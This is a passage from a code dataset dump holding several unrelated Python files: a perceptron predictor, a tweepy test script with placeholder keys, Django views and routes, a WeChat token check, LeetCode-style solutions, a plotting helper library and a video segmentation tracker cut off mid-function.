Max(0~9)\n predict = np.where(predict_vec == Max)[0]\n\n return predict\n\n'''\npredict inputdata in the type of array. predict value is 0~9, and output type is vector\ninput : inputdata, trainparaW(trained paraW (10,784))\noutput : predict vector. this vector elements are predict value of each inputdata(vector).\n'''\ndef predict_array(inputArray, trainparaW, coeffi, penaModel):\n dataNum, dimNum = inputArray.shape\n record = np.zeros((dataNum,1))\n\n for i in range(dataNum):\n inputVec = inputArray[i]\n predictVal = predict_vec(inputVec, trainparaW, coeffi, penaModel)\n record[i] = predictVal\n\n return record\n\n'''\nreseach correct persentage.\ninput : predicted vector, test's outputdata in the type of vector.\noutput : correct persentage. (scalor)\n'''\ndef accuracy(predictVec, t_outputVec):\n dataNum = predictVec.shape[0]\n\n judge_vec = predictVec - t_outputVec\n correctlist = np.where(judge_vec == 0)[0]\n correctNum = len(correctlist)\n\n persentage = correctNum / dataNum\n\n return persentage\n","repo_name":"yuuuuuya/perceptron","sub_path":"m_src/m_predictutil.py","file_name":"m_predictutil.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41676555284","text":"import os\nimport tweepy as tp\nfrom time import sleep\n\n# this is just a simple test script, nothing more, nothing less.\n\n# fill your api keys and access tokens\n\nconsumer_key = 'your-consumer-key'\nconsumer_secret = 'your-consumer-secret'\naccess_token = 'your-access-token'\naccess_secret = 'your-access-secret'\n\nauth = tp.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\n\napi = tp.API(auth)\n\nuser = api.me()\n\nprint(user.name)\nprint(user.location)","repo_name":"n00bsaiboth/RaspberryPi-Twitterbot","sub_path":"code/tweetbot.py","file_name":"tweetbot.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72173993673","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nimport json\n\n# Create your views here.\ndef weather(request, city, year):\n '''1.路由url的路径传递参数'''\n return HttpResponse('路由url的路径传递参数 城市: %s 年份: %s' % (city, year))\n\ndef query_user(request):\n param_dict = request.GET\n print(request.GET)\n print(type(request.GET))\n name = param_dict.get('name', 'haha')\n age = param_dict.getlist('age')\n return HttpResponse('查询字符串传递参数:%s %s' % (name, age))\n\n\ndef body_form(request):\n param_dict = request.POST\n print(request.POST)\n print(type(request.POST))\n name = param_dict.get('name', '')\n age = param_dict.get('age', '')\n return HttpResponse('请求体传递参数--form表单格式:%s %s' % (name, age))\n\n\ndef body_notform(request):\n b_data = request.body\n print(type(b_data))\n json_str = b_data.decode()\n print(type(json_str))\n my_dict = json.loads(json_str)\n print(type(my_dict))\n return HttpResponse('请求体传递参数---非表单格式数据:%s' % my_dict)\n\n\ndef header(request):\n dict = request.META\n content_type = dict.get('CONTENT_TYPE', '')\n return HttpResponse('请求头传递参数:%s' % content_type)\n\n\ndef others(request):\n method = request.method\n print(method)\n user = request.user\n print(user)\n path = request.path\n print(path)\n encoding = request.encoding\n print(encoding)\n files = request.FILES\n return HttpResponse('6.HTTPResponse请求对象其他常用属性')","repo_name":"jietui/django_project","sub_path":"practice/request_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9086212598","text":"# Sometimes people repeat letters to represent extra feeling, such as \"hello\" -> \"heeellooo\", \"hi\" -> \"hiiii\". In\n# these strings like \"heeellooo\", we have groups of adjacent letters that are all the same: \"h\", \"eee\", \"ll\", \"ooo\".\n#\n# For some given string S, a query word is stretchy if it can be made to be equal to S by any number of applications\n# of the following extension operation: choose a group consisting of characters c, and add some number of characters\n# c to the group so that the size of the group is 3 or more.\n#\n# For example, starting with \"hello\", we could do an extension on the group \"o\" to get \"hellooo\", but we cannot get\n# \"helloo\" since the group \"oo\" has size less than 3. Also, we could do another extension like \"ll\" -> \"lllll\" to\n# get \"helllllooo\". If S = \"helllllooo\", then the query word \"hello\" would be stretchy because of these two\n# extension operations: query = \"hello\" -> \"hellooo\" -> \"helllllooo\" = S.\n#\n# Given a list of query words, return the number of words that are stretchy.\n\n# solution:\n# 我们首先将 S 拆分成若干组相同的字母,并存储每组字母的长度。例如当 S 为 abbcccddddaaaaa 时,可以得到 5 组字母,它们分别为 abcda,长度为 [1, 2, 3, 4, 5]。\n#\n# 对于 words 中的每个单词 word,如果它可以扩张得到 S,那么它必须和 S 有相同的字母组。对于每一组字母,假设 S 中有 c1 个,word 中有 c2 个,那么会有下面几种情况:\n#\n# 如果 c1 < c2,那么 word 不能扩张得到 S;\n#\n# 如果 c1 >= 3,那么只要添加 c1 - c2 个字母即可;\n#\n# 如果 c1 < 3,由于在扩张时至少需要添加到 3 个字母,所以此时不能添加字母,必须有 c1 == c2。\n#\n# 如果 word 的包含的字母组中的每个字母都满足上述情况,那么 word 可以扩张得到 S。\n\ndef expressiveWords(S, words):\n count = 0\n for word in words:\n if canStrechy(S, word) is True:\n count += 1\n return count\n\n\ndef getKeyTable(str):\n table = []\n for ele in str:\n if not table:\n table.append([ele, 1])\n else:\n if ele == table[-1][0]:\n table[-1][1] += 1\n else:\n table.append([ele, 1])\n return table\n\n\ndef canStrechy(S, word):\n counter_S = getKeyTable(S)\n counter_word = getKeyTable(word)\n for i in range(len(S)):\n if len(counter_S) != len(counter_word):\n break\n if counter_S[i][0] != counter_word[i][0]:\n break\n if counter_S[i][1] < 3 and counter_S[i][1] != counter_word[i][1]:\n break\n if i == len(counter_S) - 1:\n return True\n return False\n\n\nprint(expressiveWords('helloo', [\"hello\"]))\n","repo_name":"riCoYanG-byte/leetcode","sub_path":"strings/No908.py","file_name":"No908.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"19542761945","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport matplotlib.patches as patches\n\n\ndef scatter_plot(df, x_col, y_col, cate_col=None, title=None):\n \"\"\"\n 二维散点图\n :Params: df: dataframe contains x_axis, y_axis, category\n :Params: x_col: x_axis, str\n :Params: y_col: y_axis, str\n :Params: cate_col: category variable, str\n :Params: title: title of graph, str\n ----------\n \"\"\"\n x_str = x_col.capitalize()\n y_str = y_col.capitalize()\n categories = np.unique(df[cate_col])\n colors = [plt.cm.tab10(i/float(len(categories)-1)) \n for i in range(len(categories))]\n plt.figure(figsize=(10, 8), dpi= 80, facecolor='w', edgecolor='k')\n for i, category in enumerate(categories):\n plt.scatter(x_col, y_col, \n data=df.loc[df[cate_col]==category, :], \n s=20, cmap=colors[i], label=str(category))\n\n plt.gca().set(xlabel=x_str, ylabel=y_str)\n plt.xticks(fontsize=12); plt.yticks(fontsize=12)\n title = title if title else \"Scatterplot of %s vs %s\" % (x_str, y_str)\n plt.title(title, fontsize=22)\n plt.legend(fontsize=12) \n plt.show()\n \ndef lmplot(df, x_col, y_col, cate_col=None, title=None):\n \"\"\"\n 线性拟合图\n \"\"\"\n sns.set_style(\"white\")\n gridobj = sns.lmplot(x=x_col, y=y_col, hue=cate_col, data=df, \n height=7, aspect=1.6, robust=True, palette='tab10', \n scatter_kws=dict(s=60, linewidths=.7, edgecolors='black'))\n title = title if title else \"Scatterplot with line of best fit\"\n plt.title(title, fontsize=20)\n plt.show()\n \ndef strip_plot(df, x_col, y_col, cate_col=None, title=None):\n \"\"\"\n Strip Plot 抖动图\n 通常,多个数据点具有完全相同的 X 和 Y 值。 结果,多个点绘制会重叠并隐藏。 \n 为避免这种情况,请将数据点稍微抖动,以便直观地看到它们。\n \"\"\"\n fig, ax = plt.subplots(figsize=(10, 8), dpi=80)\n sns.stripplot(x=x_col, y=y_col, hue=cate_col, \n data=df, jitter=0.25, size=8, ax=ax, linewidth=.5)\n title = title if title else \"Use jittered plots to avoid overlapping of points\" \n plt.title(title, fontsize=22)\n plt.show()\n \ndef count_plot(df, x_col, y_col, title=None):\n \"\"\"\n 避免点重叠问题的另一个选择是增加点的大小,这取决于该点中有多少点。 \n 因此,点的大小越大,其周围的点的集中度越高。\n \"\"\"\n df_counts = df.groupby([x_col, y_col]).size().reset_index(name='counts')\n fig, ax = plt.subplots(figsize=(16,10), dpi= 80) \n sns.stripplot(df_counts[x_col], df_counts[y_col], \n size=df_counts.counts*2, ax=ax)\n title = title if title else 'Counts Plot'\n plt.title(title, fontsize=22)\n plt.show() \n \ndef marginal_histogram(df, x_col, y_col, cate_col=None, title=None):\n \"\"\"边缘直方图\n 具有沿 X 和 Y 轴变量的直方图。 这用于可视化 X 和 Y 之间的关系\n 以及单独的 X 和 Y 的单变量分布。 这种图经常用于探索性数据分析(EDA)。\n \"\"\"\n fig = plt.figure(figsize=(10, 8), dpi= 80)\n grid = plt.GridSpec(4, 4, hspace=0.5, wspace=0.2)\n ax_main = fig.add_subplot(grid[:-1, :-1])\n ax_right = fig.add_subplot(grid[:-1, -1], xticklabels=[], yticklabels=[])\n ax_bottom = fig.add_subplot(grid[-1, 0:-1], xticklabels=[], yticklabels=[])\n if cate_col:\n c = df[cate_col].astype('category').cat.codes\n else:\n c = None\n ax_main.scatter(x_col, y_col, c=c,\n alpha=.9, data=df, cmap=\"tab10\", edgecolors='gray', linewidths=.5)\n ax_bottom.hist(df[x_col], 40, histtype='stepfilled', \n orientation='vertical', color='deeppink')\n ax_bottom.invert_yaxis()\n ax_right.hist(df[y_col], 40, histtype='stepfilled',\n orientation='horizontal', color='deeppink')\n title = title if title else 'Scatterplot with Histograms %s vs %s' \\\n % (x_col, y_col)\n ax_main.set(title=title, xlabel=x_col, ylabel=y_col)\n ax_main.title.set_fontsize(20)\n for item in ([ax_main.xaxis.label, ax_main.yaxis.label] \\\n + ax_main.get_xticklabels() + ax_main.get_yticklabels()):\n item.set_fontsize(14)\n \n xlabels = ax_main.get_xticks().tolist()\n ax_main.set_xticklabels(xlabels)\n plt.show()\n\ndef marginal_boxplot(df, x_col, y_col, cate_col=None, title=None):\n \"\"\"边缘箱图\n 与边缘直方图具有相似的用途。 然而,箱线图有助于精确定位 X 和 Y \n 的中位数、第25和第75百分位数。\n \"\"\"\n fig = plt.figure(figsize=(10, 8), dpi= 80)\n grid = plt.GridSpec(4, 4, hspace=0.5, wspace=0.2)\n ax_main = fig.add_subplot(grid[:-1, :-1])\n ax_right = fig.add_subplot(grid[:-1, -1], xticklabels=[], yticklabels=[])\n ax_bottom = fig.add_subplot(grid[-1, 0:-1], xticklabels=[], yticklabels=[])\n if cate_col:\n c = df[cate_col].astype('category').cat.codes\n else:\n c = None\n ax_main.scatter(x_col, y_col, c=c, alpha=.9, data=df, \n cmap=\"Set1\", edgecolors='black', linewidths=.5)\n sns.boxplot(df[x_col], ax=ax_right, orient=\"v\")\n sns.boxplot(df[y_col], ax=ax_bottom, orient=\"h\")\n ax_bottom.set(xlabel='')\n ax_right.set(ylabel='')\n title = title if title else 'Scatterplot with Histograms %s vs %s' \\\n % (x_col, y_col)\n ax_main.set(title=title, xlabel='displ', ylabel='hwy')\n ax_main.title.set_fontsize(20)\n for item in ([ax_main.xaxis.label, ax_main.yaxis.label] \\\n + ax_main.get_xticklabels() + ax_main.get_yticklabels()):\n item.set_fontsize(14)\n plt.show() \n \ndef corr_plot(df, x_variables, title=None):\n \"\"\"相关系数热力图\"\"\"\n plt.figure(figsize=(10,8), dpi= 80)\n sns.heatmap(df.corr(), xticklabels=df[x_variables].corr().columns, \n yticklabels=df.corr().columns, cmap='RdYlGn', center=0, annot=True)\n title = title if title else 'Correlogram of Variables'\n plt.title(title, fontsize=22)\n plt.xticks(fontsize=12)\n plt.yticks(fontsize=12)\n plt.show()\n \ndef pairplot(df, x_variables, cate_cols=None, title=None):\n \"\"\"矩阵图\n \"\"\"\n plt.figure(figsize=(10,8), dpi= 80)\n sns.pairplot(df, kind=\"scatter\", hue=cate_cols, \n plot_kws=dict(s=80, edgecolor=\"white\", linewidth=2.5))\n title = title if title else 'Pair Plot'\n plt.title(title, fontsize=22)\n plt.show()\n\ndef diverging_bar_plot(df, x_col, y_col, title=None):\n \"\"\"发散型条形图\n \"\"\"\n x_str_z = x_col + '_z'\n df[x_str_z] = (df[x_col] - df[x_col].mean()) / df[x_col].std()\n df['colors'] = np.where(df[x_str_z] < 0, 'green', 'red')\n df.sort_values(x_str_z, inplace=True)\n df.reset_index(inplace=True)\n plt.figure(figsize=(14,10), dpi= 80)\n plt.hlines(y=df.index, xmin=0, xmax=df[x_str_z], \n color=df['colors'], alpha=0.4, linewidth=5)\n plt.gca().set(ylabel='$Model$', xlabel=x_col)\n plt.yticks(df.index, df[y_col], fontsize=12)\n title = title if title else 'Diverging Bars of %s' % y_col\n plt.title(title, fontdict={'size':20})\n plt.grid(linestyle='--', alpha=0.5)\n plt.show()\n\ndef ordered_bar_chart(df, x_col, cate_col, title=None):\n \"\"\"\n 有序柱形图\n \"\"\"\n df = df[[x_col, cate_col]].groupby(cate_col).agg({x_col: 'mean'})\n df.sort_values(x_col, inplace=True)\n df.reset_index(inplace=True)\n fig, ax = plt.subplots(figsize=(16,10), facecolor='white', dpi= 80)\n ax.vlines(x=df.index, ymin=0, ymax=df[x_col], \n color='firebrick', alpha=0.7, linewidth=20)\n for i, cty in enumerate(df[x_col]):\n ax.text(i, cty+0.1, round(cty, 1), horizontalalignment='center')\n title = title if title else \"Bar chart\"\n ax.set_title(title, fontdict={'size':22})\n ax.set(ylabel=cate_col, ylim=(0, df[x_col].max() + 0.8))\n plt.xticks(df.index, df[cate_col], rotation=60, \n horizontalalignment='right', fontsize=12)\n p1 = patches.Rectangle((.57, -0.005), width=.33, height=.13, \n alpha=.1, facecolor='green', transform=fig.transFigure)\n p2 = patches.Rectangle((.124, -0.005), width=.446, height=.13, \n alpha=.1, facecolor='red', transform=fig.transFigure)\n fig.add_artist(p1)\n fig.add_artist(p2)\n plt.show()\n\ndef lollipop_chart(df, x_col, cate_col, title=None): \n \"\"\"\n 棒棒糖图,类似柱形图\n \"\"\"\n df = df[[x_col, cate_col]].groupby(cate_col).agg({x_col: 'mean'})\n df.sort_values(x_col, inplace=True)\n df.reset_index(inplace=True)\n df.rename(columns={x_col: 'x_col'}, inplace=True)\n fig, ax = plt.subplots(figsize=(12,8), dpi= 80)\n ax.vlines(x=df.index, ymin=0, ymax=df['x_col'], \n color='firebrick', alpha=0.7, linewidth=2)\n ax.scatter(x=df.index, y=df['x_col'], s=75, color='firebrick', alpha=0.7)\n title = title if title else \"Lollipop Chart\"\n ax.set_title(title, fontdict={'size':22})\n ax.set_ylabel(x_col)\n ax.set_xticks(df.index)\n ax.set_xticklabels(df[cate_col], rotation=60, \n fontdict={'horizontalalignment': 'right', 'size':12})\n ax.set_ylim(0, 30)\n for row in df.itertuples():\n ax.text(row.Index, row.x_col+.5, s=round(row.x_col, 2), \n horizontalalignment= 'center', verticalalignment='bottom', fontsize=14)\n plt.show()\n\ndef density_plot(df, x_col, cate_col, title=None):\n \"\"\"\n 密度函数曲线\n \"\"\"\n plt.figure(figsize=(10,8), dpi= 80)\n categories = df[cate_col].unique()\n for i, category in enumerate(categories):\n data = df[df[cate_col] == category]\n sns.kdeplot(data[x_col], shade=True, label=\"{}={}\".format(cate_col, category), alpha=.7)\n title = title if title else \"Density Plot\"\n plt.title(title, fontsize=22)\n plt.legend()\n plt.show() \n\ndef density_histogram_plot(df, x_col, cate_col, title=None):\n \"\"\"\n 密度函数-直方图\n \"\"\"\n plt.figure(figsize=(10,8), dpi= 80)\n categories = df[cate_col].unique()\n for i, category in enumerate(categories):\n data = df[df[cate_col] == category]\n sns.distplot(data[x_col], label=category, hist_kws={'alpha':.7}, kde_kws={'linewidth':3})\n title = title if title else \"Density Historgram Plot \" \n plt.title(title, fontsize=22)\n plt.legend()\n plt.show()\n\ndef population_pyramid(df, x_col, y_col, cate_col, title=None):\n \"\"\"\n 金字塔: example cate_col: Gender\n \"\"\"\n plt.figure(figsize=(10,8), dpi=80)\n order_of_bars = df[y_col].unique()[::-1]\n colors = [plt.cm.Spectral(i/float(len(df[cate_col].unique())-1)) for i in range(len(df[cate_col].unique()))]\n \n for c, group in zip(colors, df[cate_col].unique()):\n sns.barplot(x=x_col, y=y_col, data=df.loc[df[cate_col]==group, :], order=order_of_bars, color=c, label=group)\n \n # Decorations \n plt.xlabel(\"${}$\".format(x_col))\n plt.ylabel(y_col)\n plt.yticks(fontsize=12)\n title = title if title else \"Population Pyramid \"\n plt.title(title, fontsize=22)\n plt.legend()\n plt.show()\n \ndef pie_chart(df, cate_col, title=None):\n \"\"\"\n 饼状图\n \"\"\"\n df = df.groupby(cate_col).size()\n df.plot(kind='pie', subplots=True, figsize=(8, 8))\n title = title if title else \"Pie Chart\"\n plt.title(\"Pie Chart of Vehicle Class - Bad\")\n plt.ylabel(\"\")\n plt.show()","repo_name":"liangjingwei/data_analysis","sub_path":"plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":11512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"74286714632","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport hashlib\n\nfrom django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse\n\nfrom zeus.controller.BusinessController import BusinessController\n\nlogger = logging.getLogger(\"django.request\")\n\n\n# django默认开启csrf防护,这里使用@csrf_exempt去掉防护\n@csrf_exempt\ndef token(request):\n logger.debug(request.get_full_path())\n if request.method == \"GET\":\n # 接收微信服务器get请求发过来的参数\n signature = request.GET.get('signature', None)\n timestamp = request.GET.get('timestamp', None)\n nonce = request.GET.get('nonce', None)\n echostr = request.GET.get('echostr', None)\n # 服务器配置中的token\n token = 'weixin'\n # 把参数放到list中排序后合成一个字符串,再用sha1加密得到新的字符串与微信发来的signature对比,如果相同就返回echostr给服务器,校验通过\n hash_list = [token, timestamp, nonce]\n hash_list.sort()\n hash_str = ''.join([s for s in hash_list])\n hash_str = hashlib.sha1(hash_str.encode()).hexdigest()\n if hash_str == signature:\n return HttpResponse(echostr)\n else:\n return HttpResponse(\"field\")\n else:\n body = request.body\n logger.debug(\n '''\n =========REQUEST========= \n %s\n =========================\n ''' % body.decode(\"utf-8\")\n )\n other_content = BusinessController().auto_reply(body)\n logger.debug(\n '''\n =========RESPONSE========\n %s\n =========================\n ''' % other_content\n )\n return HttpResponse(other_content)\n","repo_name":"flyliufu/PythonDemo","sub_path":"zeus/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8333241325","text":"import pandas as pd\n\n\nfrom preprocess.obj_to_df.obj_to_df_single import obj_to_df_single\n\n\ndef obj_to_df_multi(json_file):\n lst_lst = []\n new_json_file = []\n\n key_dict = ''\n for obj in json_file:\n for key in obj:\n if type(obj[key]) == dict:\n key_dict = key\n break\n\n curr_id = 0\n for obj in json_file:\n new_json = obj[key_dict]\n new_json['_id_'] = curr_id\n obj[key_dict] = curr_id\n new_json_file.append(new_json)\n curr_id += 1\n\n data = [\n obj_to_df_single(json_file),\n obj_to_df_single(new_json_file)\n ]\n\n return data\n","repo_name":"theketan26/da-tool","sub_path":"preprocess/obj_to_df/obj_to_df_multi.py","file_name":"obj_to_df_multi.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"3970766208","text":"class Solution:\n def isToeplitzMatrix(self, matrix: List[List[int]]) -> bool:\n checker = {}\n for row in range(len(matrix)):\n for col in range(len(matrix[0])):\n number = matrix[row][col]\n difference = row - col\n if difference in checker:\n if checker[difference] != number:\n return False\n else:\n checker[difference] = number\n\n return True\n","repo_name":"aklileseyoum/A2SV","sub_path":"Toeplitz_matrix.py","file_name":"Toeplitz_matrix.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11313723580","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"measuring-request-form\"),\n path(\"measuringdatapart/\", views.getdatapart, name=\"measuring-data-part\"),\n path(\"measuringdatamaterial/\", views.getmaterial, name=\"measuring-data-part\"),\n path(\"applicantsandrecipients/\", views.getEmployees, name=\"applicantsandrecipients\"),\n path(\"insertemployees/\", views.insertEmployees, name=\"insert-employees\"),\n path(\"save-measuring-request-form/\", views.saveRequestMeasuringForm, name=\"save-measuring\"),\n path(\"view-email/\", views.viewEmail, name=\"view-email\"),\n path(\"/\", views.addSignature, name=\"edit-measuring\"),\n path(\"update-measuring-request-form-spv//\", views.updateMeasuringFromSpv, name=\"update-measuring-from-spv\"),\n path(\"update-measuring-request-form-staff-lab//\", views.updateMeasuringFromStaffLab, name=\"update-measuring-from-staff-lab\"),\n path(\"update-measuring-request-form-spv-lab//\", views.updateMeasuringFromSpvLab, name=\"update-measuring-from-spv-lab\"),\n path(\"create-notif/\", views.createNotification, name=\"create-notification\"),\n]","repo_name":"juandelima/Quality-Assurance-Lab---Django","sub_path":"measuring_request_form/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73111180231","text":"import torch\nfrom torch import nn\nimport numpy as np\nfrom torch.nn.modules.utils import _pair\nfrom davos.lib import TensorList\nfrom davos.eval.lib.preprocessing import sample_patch_multiscale, sample_patch_transformed, sample_patch\nfrom collections import OrderedDict as odict\n# noinspection PyUnresolvedReferences\nfrom davos.lib.debug import DebugVis\nfrom .common import Frame, uncrop, Memory, SpatialTracker\n\n\ndef get_tracker_class():\n return DLWL\n\nwarn_distractors_disabled = True\n\nclass DLWL(nn.Module):\n\n def __init__(self, object_id, params):\n super().__init__()\n self.params = params\n self.update_distractors = eval(\"self.\" + getattr(params, 'update_distractor_fn', 'update_distractors_wta'))\n self.ignore_distractors = getattr(params, 'ignore_distractors', False)\n\n self.object_id = object_id\n self.net = self.params.net\n self.device = next(self.net.parameters()).device\n self.spatial_tracker = SpatialTracker(params)\n self.memory = Memory(params)\n\n\n def make_distractors(self, labels, object_id, prev_distractors=None, disable=False):\n\n fg = (labels == object_id)\n\n if not disable:\n pdt = (prev_distractors.squeeze() != 0) if prev_distractors is not None else False\n dt = ~fg & ((labels != 0) | pdt)\n else:\n dt = torch.zeros_like(fg, dtype=torch.bool)\n\n m = torch.stack([fg, dt])\n m = m.view(-1, *m.shape[-3:]).float()\n\n return m\n\n def initialize(self, frame: Frame, prev_frame, bbox=None):\n\n self.cached_object_ids = None\n self.frame_num = 1\n\n # Set up mask and distractors\n prev_dt = prev_frame.segmentation.get(self.object_id, None) if prev_frame is not None else None\n mask = self.make_distractors(frame.labels, self.object_id, prev_dt, disable=self.ignore_distractors)\n frame.segmentation[self.object_id] = mask.squeeze(0)\n\n # Initialize target position and size\n self.spatial_tracker.initialize(bbox)\n\n # Initialize target model\n im = frame.image.unsqueeze(0).float()\n im_patches, feat_bbone, masks = self.generate_init_samples(im, mask)\n masks = masks.unsqueeze(1) # Add seq dim\n self.init_target_model(feat_bbone, masks)\n\n return frame\n\n def track(self, frame, prev_frame):\n self.debug_info = {}\n\n tg_channel = 0\n\n assert self.object_id is not None\n obj_id = self.object_id\n\n self.frame_num += 1\n self.debug_info['frame_num'] = self.frame_num\n\n # Obtain the merged segmentation prediction for the previous frames.\n # This is used to update the target model and determine the search\n # region for the current frame\n im = frame.image.unsqueeze(0).float()\n prev_seg_prob = prev_frame.segmentation_raw[obj_id]\n\n # Update the target model with merged masks and data from the previous frame\n skip_update = False\n if self.frame_num > 2:\n if self.params.get('update_target_model', True):\n\n # Crop the segmentation mask for the previous search area\n prev_seg_prob_crop, _ = sample_patch(\n prev_seg_prob, self.prev_pos, self.prev_scale * self.prev_im_size, self.prev_im_size,\n mode=self.params.get('border_mode', 'replicate'), max_scale_change=self.params.get('patch_max_scale_change'),\n is_mask=True) # is_mask=True disables replication padding\n\n #bb = self.spatial_tracker.get_target_bbox(prev_seg_prob_crop[0,0], tlhw=True)\n # nnn = (prev_seg_prob[0,0] > 0.5).sum().item()\n # print(nnn)\n # if nnn < 8000:\n # skip_update = True\n\n # Update the target model\n if not skip_update:\n self.update_target_model(self.prev_feat_tm, prev_seg_prob_crop.clone())\n\n # Estimate target bbox\n tg_prob = prev_seg_prob[0, 0] # Extract from first score channel\n if not skip_update:\n self.spatial_tracker.update_target_bbox_estimate(tg_prob)\n\n # Predict segmentation for the current frame\n\n # Get image patches and extract features\n pos, scale, im_size = self.spatial_tracker.get_centered_sample_pos() # From target bbox estimate\n sample_coords, im_patches = self.extract_patches(im, pos, scale, im_size)\n feat_bbone = self.extract_backbone_features(im_patches)\n feat_tm = self.extract_target_model_features(feat_bbone)\n\n # Save data for merging, for the next frame update\n self.prev_pos, self.prev_scale, self.prev_im_size = self.spatial_tracker.get_centered_sample_pos()\n sample_pos, sample_scale = self.spatial_tracker.get_sample_location(sample_coords)\n self.prev_feat_tm = feat_tm\n\n # Segment the target\n seg_scores, mask_enc_pred = self.segment_target(feat_tm, feat_bbone, im_patches.shape[-2:], get_mask_enc=True) # Raw scores, logits\n seg_scores = uncrop(seg_scores, sample_pos, sample_scale, im.shape[-2:], outside_value=-100.0) # Uncrop to full image\n\n seg_prob = torch.sigmoid(seg_scores) # Probability of being target/distractor at each pixel\n seg_mask = (seg_prob > 0.5).float() # Binary segmentation mask\n\n # Get target box from the predicted segmentation\n tg_prob = seg_prob[0] # Extract from first score channel\n new_bbox = torch.cat(self.spatial_tracker.get_target_bbox(tg_prob, tlhw=True))\n\n if hasattr(self, 'vis'):\n self.vis.imshow(im, \"image\")\n m = seg_mask\n im = torch.stack((m[1], m[0], torch.zeros_like(m[0])), dim=-3)\n self.vis.imshow(im, \"mask (green), distractor (red)\")\n self.vis.show_rawseg(seg_scores[0], title=\"predicted target\")\n self.vis.show_rawseg(seg_scores[1], title=\"predicted distractors\")\n self.vis.show_enclb(mask_enc_pred, title=\"predicted encoded mask\")\n pass\n\n assert self.object_id is not None # Multi-object mode\n\n # Save output\n\n frame.segmentation[obj_id] = seg_mask.view(*seg_mask.shape[-3:]).cpu()\n frame.target_bbox[obj_id] = new_bbox.tolist()\n frame.segmentation_raw[obj_id] = seg_scores.cpu()\n\n return frame\n\n def update_distractors_wta_clean(self, L, S, I):\n \"\"\"\n :param L: Label map (byte-image with object ids)\n :param S: Target segmentation probabilities (0.0 - 1.0)\n :param I: List of object ids, matching order in S\n \"\"\"\n\n p_max = S.max(dim=0, keepdim=True).values\n p_min = S.min(dim=0, keepdim=True).values\n\n D = []\n If = (L != 0).float()\n for k, i in enumerate(I):\n Id = (L != i).float() * If\n d_i = Id * p_max + (1 - If) * p_min()\n D.append(d_i)\n\n return D\n\n def update_distractors_passthrough(self, object_ids, seg_probs: torch.Tensor, dis_scores: torch.Tensor, merged_labels):\n return dis_scores\n\n def update_distractors_zero(self, object_ids, seg_probs: torch.Tensor, dis_scores: torch.Tensor, merged_labels):\n return torch.zeros_like(dis_scores)\n\n def update_distractors_wta(self, object_ids, seg_probs: torch.Tensor, dis_scores: torch.Tensor, merged_labels):\n \"\"\" Generate distractors with a winner-takes-all approach.\n\n For target i, let the distractors be max(seg_scores[j]) for all j != i,\n in the area marked as occupied by any target in merged_labels.\n The distractor background will be min(seg_scores[k]) for all k,\n in the area marked as background in merged_labels.\n\n :param object_ids: List of object ids, WITHOUT the background\n :param seg_probs: Target segmentation probabilities (0.0 - 1.0), INCLUDING the background in [...,0,:,:]\n :param dis_scores: Distractor scores, (0.0 - 1.0) INCLUDING the background in [...,0,:,:]\n :param merged_labels: Label map (byte-image with object ids)\n \"\"\"\n if dis_scores is None:\n return None\n\n dt_probs = torch.zeros_like(seg_probs)\n if self.ignore_distractors:\n global warn_distractors_disabled\n if warn_distractors_disabled:\n print(\"distractors are disabled\")\n warn_distractors_disabled = False\n return dt_probs\n\n lb = torch.from_numpy(merged_labels).to(seg_probs.device)\n fg = (lb != 0)\n bg = (~fg).float()\n\n max_prob = seg_probs[1:].max(dim=0, keepdim=True).values\n min_prob = seg_probs[1:].min(dim=0, keepdim=True).values\n\n for i, obj_id in enumerate(object_ids):\n dt = ((lb != int(obj_id)) & fg).unsqueeze(0).float() # Distractor mask\n dt_probs[i+1] = max_prob * dt + min_prob * bg\n\n return dt_probs\n\n def _merge_sigmoid(self, object_ids, seg_scores):\n\n seg_scores, dis_scores = torch.split(seg_scores, 1, dim=-3)\n\n # Obtain seg. probability and scores for background label\n eps = 1e-7\n seg_prob = torch.sigmoid(seg_scores)\n bg_prob = torch.prod(1 - seg_prob, dim=0, keepdim=True).clamp(eps, 1.0 - eps)\n bg_score = (bg_prob / (1.0 - bg_prob)).log()\n\n seg_scores_all = torch.cat((bg_score, seg_scores), dim=0)\n out = []\n for s in seg_scores_all:\n s_out = 1.0 / (seg_scores_all - s.unsqueeze(0)).exp().sum(dim=0)\n out.append(s_out)\n seg_probs_all = torch.stack(out, dim=0)\n\n dis_probs_all = torch.sigmoid(torch.cat((bg_score, dis_scores), dim=0))\n\n # Obtain segmentation labels\n obj_ids_all = np.array([0, *map(int, object_ids)], dtype=np.uint8)\n merged_labels = obj_ids_all[seg_probs_all.argmax(dim=0).cpu()]\n\n # Update distractors and re-join target and distractor segments\n dis_probs_all = self.update_distractors(object_ids, 